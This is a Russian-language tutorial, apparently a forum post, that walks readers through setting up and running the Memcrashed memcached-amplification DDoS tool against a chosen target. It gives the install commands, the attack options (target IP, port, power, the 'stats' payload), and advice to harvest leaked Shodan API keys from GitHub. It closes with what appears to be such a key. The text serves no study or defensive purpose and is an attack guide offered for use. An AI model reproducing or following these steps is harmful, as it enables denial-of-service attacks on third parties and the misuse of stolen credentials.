Большинство из вас слышали об атаке на сайт Github? Те то не слышал просто погуглите...
Для усиления атаки использовались сервера Memcrashed, мощность которой составила около 1,35Тб/сек.
Сегодня мы разберем как-же рабобать с таким софтом.
Для работы нам нужен будет Kali Linux.
Открываем терминал и для начала обновимся:
apt update
apt upgrade
Далее переходим к установке Python, если у вас его еще нет:
apt-get install python3
apt-get install python3-pip
Затем на нужно установить еще два необходимих компонента:
pip install scapy
pip install shodan
Теперь о главном. Переходим к установке Memcrashed
git clone https://github.com/zadachnik/memcrashed-ddos.git
Идем в папку:
cd memcrashed-ddos
Затем:
pip install -r requirements.txt
Если у вас во время установки возниктун какие-то проблемы то решение может быть в версиях python3 и pip.
Вместо pip install ... нужно вводить pip3 install ... и так дале.
Memcrashed будет требовать ввести apikey shodan (кто не знаком с shodan - можете загуглиь). apikey также можете искать и на github.com по по анологичной фразе: apikey // ApiKey // ApiKey Shodan //
10 минут поиска и я без проблем нашел валидный ключ shodan.io. (Платная фулл версия около 3000 рублей)
Запускаем Memcrashed:
python3 Memcrashed.py
Далее всё легко и просто.
Memcrashed может хранить данные shodan (сервера memcashed) а также использовать из без всяких подключений к shodan
После чего memcashed есть ли у вас локальные боты или же будет искать их по апи на шодан.
- Спросит IP (target - это наша цель) и вам нужно будет указать на какой порт будет происходить атака. Для этого нужно будет найти открытый порт по ип. (гугл в помощь). Вводим мощность атаки
- ( Enter preferred power (Default 1): ) и какой payload будет использовать ( Enter payload contained inside packet) по умолчанию лучшим вариантом будет использование stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).
- Так же программа предложит сохранить все сервера в файл bots.txt (для возможности использования без shodan). " Would you like to display all the bots from Shodan? <Y/n>: " при вводе "y" начнется перечисление серверов на мониторе:
(Для очень сильных лентяев PSKINdQe1GyxGgecYz2191H2JoS9qvgD)